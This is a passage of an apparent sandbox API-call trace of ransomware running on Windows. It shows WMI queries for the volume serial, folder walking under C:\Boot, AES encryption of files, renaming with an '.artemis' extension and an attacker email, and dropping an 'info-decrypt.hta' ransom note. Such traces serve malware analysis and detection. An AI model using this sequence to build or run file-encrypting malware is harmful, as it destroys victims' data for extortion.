dwCapabilities=0x20) returned 0x0 [0204.068] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x2 [0204.068] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0204.068] CoTaskMemFree (pv=0x77e0e8) [0204.068] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0204.068] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ede4 | out: ppvObject=0x689ede4*=0x781b04) returned 0x0 [0204.069] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eda0 | out: ppvObject=0x689eda0*=0x0) returned 0x80004002 [0204.070] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ebbc | out: ppvObject=0x689ebbc*=0x0) returned 0x80004002 [0204.070] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0204.070] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0204.071] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6ac | out: ppvObject=0x689e6ac*=0x0) returned 0x80004002 [0204.071] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e6b8 | out: ppvObject=0x689e6b8*=0x781a64) returned 0x0 [0204.071] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781a64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e6c0 | out: pCid=0x689e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.071] WbemLocator:IUnknown:Release (This=0x781a64) returned 0x3 [0204.071] CoGetContextToken (in: pToken=0x689e718 | out: pToken=0x689e718) returned 0x0 [0204.071] CoGetContextToken (in: pToken=0x689eb20 | out: pToken=0x689eb20) returned 0x0 [0204.071] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebb0 | out: ppvObject=0x689ebb0*=0x781aec) returned 0x0 [0204.071] WbemLocator:IRpcOptions:Query (in: This=0x781aec, pPrx=0x781b04, dwProperty=2, pdwValue=0x689ebd8 | out: pdwValue=0x689ebd8) returned 0x80004002 [0204.071] WbemLocator:IUnknown:Release (This=0x781aec) returned 0x3 [0204.072] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0204.072] CoGetContextToken (in: pToken=0x689f0f8 | out: pToken=0x689f0f8) returned 0x0 [0204.072] CoGetContextToken (in: pToken=0x689f058 | out: pToken=0x689f058) returned 0x0 [0204.072] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x689f128*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f124 | out: ppvObject=0x689f124*=0x6748264) returned 0x0 [0204.072] WbemLocator:IUnknown:AddRef (This=0x6748264) returned 0x4 [0204.072] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x3 [0204.072] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x2 [0204.072] SysStringLen (param_1=0x0) returned 0x0 [0204.072] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x689f4bc | out: puCount=0x689f4bc*=0x0) returned 0x0 [0204.072] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4b8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4b8*=0x20, pszText=0x0) returned 0x0 [0204.072] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4b8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4b8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.072] CoGetContextToken (in: pToken=0x689f128 | out: pToken=0x689f128) returned 0x0 [0204.072] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0204.072] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efbc | out: ppvObject=0x689efbc*=0x781b04) returned 0x0 [0204.072] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x3 [0204.072] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0204.072] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0x20, pszText=0x0) returned 0x0 [0204.072] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4c0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.073] IWbemServices:GetObject (in: This=0x6748264, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f474*=0x0, ppCallResult=0x0 | out: ppObject=0x689f474*=0x673bf90, ppCallResult=0x0) returned 0x0 [0204.354] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x689f474 | out: puCount=0x689f474*=0x2) returned 0x0 [0204.354] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x689f470*=0x0, pszText=0x0 | out: puBuffLength=0x689f470*=0xf, pszText=0x0) returned 0x0 [0204.354] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x689f470*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f470*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.354] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f470*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3483dd8*=0, plFlavor=0x3483ddc*=0 | out: pVal=0x689f470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3483dd8*=8, plFlavor=0x3483ddc*=0) returned 0x0 [0204.354] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.354] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.354] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3483dd8*=8, plFlavor=0x3483ddc*=0 | out: pVal=0x689f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3483dd8*=8, plFlavor=0x3483ddc*=0) returned 0x0 [0204.354] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.354] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.355] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.355] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x48 [0204.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4d8) returned 1 [0204.355] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x689f554 | out: lpFileInformation=0x689f554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0204.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4d4) returned 1 [0204.355] MoveFileW (lpExistingFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0204.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0204.357] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0204.357] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0204.357] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b570 [0204.357] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.358] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0204.358] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0204.358] FindClose (in: hFindFile=0x77b570 | out: hFindFile=0x77b570) returned 1 [0204.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0204.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0204.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0204.359] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0204.359] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0204.359] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b570 [0204.360] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.361] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0204.361] FindNextFileW (in: hFindFile=0x77b570, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0204.361] FindClose (in: hFindFile=0x77b570 | out: hFindFile=0x77b570) returned 1 [0204.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0204.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0204.361] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.361] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.361] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0204.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f57c) returned 1 [0204.361] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta" (normalized: "c:\\boot\\el-gr\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f5f8 | out: lpFileInformation=0x689f5f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f578) returned 1 [0204.362] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.362] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0204.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b0) returned 1 [0204.362] CreateFileW (lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta" (normalized: "c:\\boot\\el-gr\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a8 [0204.362] GetFileType (hFile=0x5a8) returned 0x1 [0204.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4ac) returned 1 [0204.362] GetFileType (hFile=0x5a8) returned 0x1 [0204.507] WriteFile (in: hFile=0x5a8, lpBuffer=0x348c85c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f574, lpOverlapped=0x0 | out: lpBuffer=0x348c85c*, lpNumberOfBytesWritten=0x689f574*=0x1000, lpOverlapped=0x0) returned 1 [0204.508] WriteFile (in: hFile=0x5a8, lpBuffer=0x348c85c*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f548, lpOverlapped=0x0 | out: lpBuffer=0x348c85c*, lpNumberOfBytesWritten=0x689f548*=0x557, lpOverlapped=0x0) returned 1 [0204.508] CloseHandle (hObject=0x5a8) returned 1 [0204.508] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f098, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f544) returned 1 [0204.508] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x348d878 | out: lpFileInformation=0x348d878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0204.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f540) returned 1 [0204.690] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0204.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f478) returned 1 [0204.690] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a8 [0204.690] GetFileType (hFile=0x5a8) returned 0x1 [0204.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f474) returned 1 [0204.691] GetFileType (hFile=0x5a8) returned 0x1 [0204.691] GetFileSize (in: hFile=0x5a8, lpFileSizeHigh=0x689f580 | out: lpFileSizeHigh=0x689f580*=0x0) returned 0x17250 [0204.778] ReadFile (in: hFile=0x5a8, lpBuffer=0x31241538, nNumberOfBytesToRead=0x17250, lpNumberOfBytesRead=0x689f52c, lpOverlapped=0x0 | out: lpBuffer=0x31241538*, lpNumberOfBytesRead=0x689f52c*=0x17250, lpOverlapped=0x0) returned 1 [0204.782] CloseHandle (hObject=0x5a8) returned 1 [0204.782] CryptAcquireContextW (in: phProv=0x689f4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f4cc*=0x7a95b8) returned 1 [0204.783] CryptGenRandom (in: hProv=0x7a95b8, dwLen=0x10, pbBuffer=0x34900b4 | out: pbBuffer=0x34900b4) returned 1 [0205.722] CryptImportKey (in: hProv=0x7a95b8, pbData=0x348fc78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f49c | out: phKey=0x689f49c*=0x77aeb0) returned 1 [0205.722] CryptContextAddRef (hProv=0x7a95b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.722] CryptContextAddRef (hProv=0x7a95b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.722] CryptDuplicateKey (in: hKey=0x77aeb0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f48c | out: phKey=0x689f48c*=0x77adf0) returned 1 [0205.722] CryptContextAddRef (hProv=0x7a95b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.723] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x4, pbData=0x348fd58*=0x1, dwFlags=0x0) returned 1 [0205.723] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x1, pbData=0x348fd24, dwFlags=0x0) returned 1 [0205.725] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x312587a8*, pdwDataLen=0x689f4f8*=0x17260, dwBufLen=0x17260 | out: pbData=0x312587a8*, pdwDataLen=0x689f4f8*=0x17260) returned 1 [0205.726] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x348fd80*, pdwDataLen=0x689f500*=0x0, dwBufLen=0x10 | out: pbData=0x348fd80*, pdwDataLen=0x689f500*=0x10) returned 1 [0205.731] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0205.731] CryptReleaseContext (hProv=0x7a95b8, dwFlags=0x0) returned 1 [0205.731] CryptReleaseContext (hProv=0x7a95b8, dwFlags=0x0) returned 1 [0205.731] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0205.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f464) returned 1 [0205.731] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0205.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2a0) returned 1 [0205.733] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0205.733] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.733] CoTaskMemFree (pv=0x9831858) [0205.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689ef58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.733] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4a0 | out: ppv=0x689f4a0*=0x72015c) returned 0x0 [0205.733] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f498 | out: pAptType=0x689f498*=1) returned 0x0 [0205.733] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f49c | out: ppvObject=0x689f49c*=0x0) returned 0x80004002 [0205.733] IUnknown:Release (This=0x72015c) returned 0x1 [0205.734] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee08 | out: ppv=0x689ee08*=0x6736fd8) returned 0x0 [0205.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736fd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f020 | out: ppvObject=0x689f020*=0x0) returned 0x80004002 [0205.734] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736fd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f034 | out: ppvObject=0x689f034*=0x67383f0) returned 0x0 [0205.734] WbemDefPath:IUnknown:Release (This=0x6736fd8) returned 0x0 [0205.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 